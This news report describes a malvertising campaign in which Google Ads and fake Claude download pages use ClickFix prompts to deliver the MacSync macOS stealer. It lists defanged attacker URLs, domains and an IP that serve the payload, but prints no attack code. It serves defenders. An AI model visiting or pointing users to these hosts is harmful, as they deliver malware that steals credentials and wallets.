macOS Malware Leverages Google Ads and Legitimate Claude.ai Shared Chats to Deliver Malware

HomeAI macOS Malware Leverages Google Ads and Legitimate Claude.ai Shared Chats to Deliver Malware By Abinaya May 11, 2026 Threat actors are executing a sophisticated malvertising campaign targeting macOS users via poisoned Google Ads and deceptive artificial intelligence applications. Researchers recently uncovered an operation that redirects victims to fraudulent landing pages via sponsored search results. By combining trusted hosting platforms with the notorious “Clickfix” social engineering tactic, attackers are successfully distributing MacSync payloads and dangerous macOS information stealers. The attack chain begins when a user searches for popular software, particularly AI tools like Claude. macOS Malware Ads Attackers manipulate search engine results by purchasing sponsored ads that appear at the top of search results pages. Because these ads often mimic legitimate vendors, end users struggle to distinguish them from authentic links. Search ads redirect users to malicious sites delivering MacSync ClickFix payloads(source : x) When clicked, these sponsored advertisements route victims to deceptive websites hosted on trusted infrastructure. To bypass initial domain reputation checks and enterprise web filters, threat actors are leveraging services like Google Sites, Framer, and even legitimate claude.ai shared chats. The landing pages are carefully designed to look like official Claude AI download portals. Google Ads and Claude.ai chats spread fake MacSync installers(source :x) When users attempt to interact with the site or download the purported desktop application, they are hit with a Clickfix prompt. This prompt uses deceptive warning dialogues to trick victims into manually executing a malicious terminal command or downloading a compromised installer under the guise of “fixing” a display error. Researchers Berk Albayrak and g0njxa published findings on X tracing the infrastructure behind the targeted malware campaign. The threat actors frequently rotate their domains and hosting platforms to evade detection while maximizing their search engine optimization. The campaign relies heavily on Google Sites to host the initial deceptive pages, with researchers identifying malicious URLs such as sites[.]google[.]com/view/cloud-version-08, sites[.]google[.]com/view/brewshka-page, and sites[.]google[.]com/view/claud-version-0505. In addition to Google Sites, the attackers have utilized the Framer platform, hosting fake applications at claude-desktop-app[.]framer[.]ai. Payload Delivery and Execution Once the victim interacts with the fake Claude AI portal, the site redirects them to the final payload delivery servers. The initial landing pages have been observed redirecting traffic to external IP addresses, such as 2[.]26[.]75[.]112/Hokojol, and to domains such as pieoneer[.]org and greenactiv[.]com. MacSync clickfix payload(source : x) These destination servers drop the MacSync clickfix payload directly onto the victim’s machine. Upon execution, the malware operates as a comprehensive macOS stealer. It is specifically designed to harvest sensitive information from the infected Apple system, including saved browser credentials, cryptocurrency wallet data, and active session tokens. The stolen data is subsequently exfiltrated back to the attackers’ command-and-control infrastructure. To defend against these deceptive malvertising campaigns, organizations and individual users must exercise extreme caution when interacting with sponsored search results. Security teams should block the known indicators of compromise at the network level and monitor macOS endpoint telemetry for unusual script execution originating from web browsers. Please educate users to avoid clicking on sponsored software download ads. They should always navigate directly to official vendor websites. Cybercriminals now enter through your suppliers instead of your front door – Free Webinar Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Abinayahttps://cybersecuritynews.com/ Abi is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space. Trending News TCLBANKER Malware Targets Users Through Self-Propagating WhatsApp and Outlook Worm Modules JDownloader Downloader Hacked to Infect Users With New Python RAT Top 10 Best Interactive Malware Analysis Tools in 2026 QLNX Targets Developers With Credential Theft Designed for Supply Chain Compromise Taiwan High Speed Rail Hacked Using Radio Signal Spoofing Attack That Halted Three Trains Latest News Cyber Security Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites Cyber Security News JDownloader Downloader Hacked to Infect Users With New Python RAT Cyber Security 10 Best Full Disk Encryption Tools in 2026 Cyber Security News Top 10 Best Interactive Malware Analysis Tools in 2026 Cyber Security ODINI Malware Uses CPU Magnetic Emissions to Breach Faraday-Shielded Air-Gapped Computers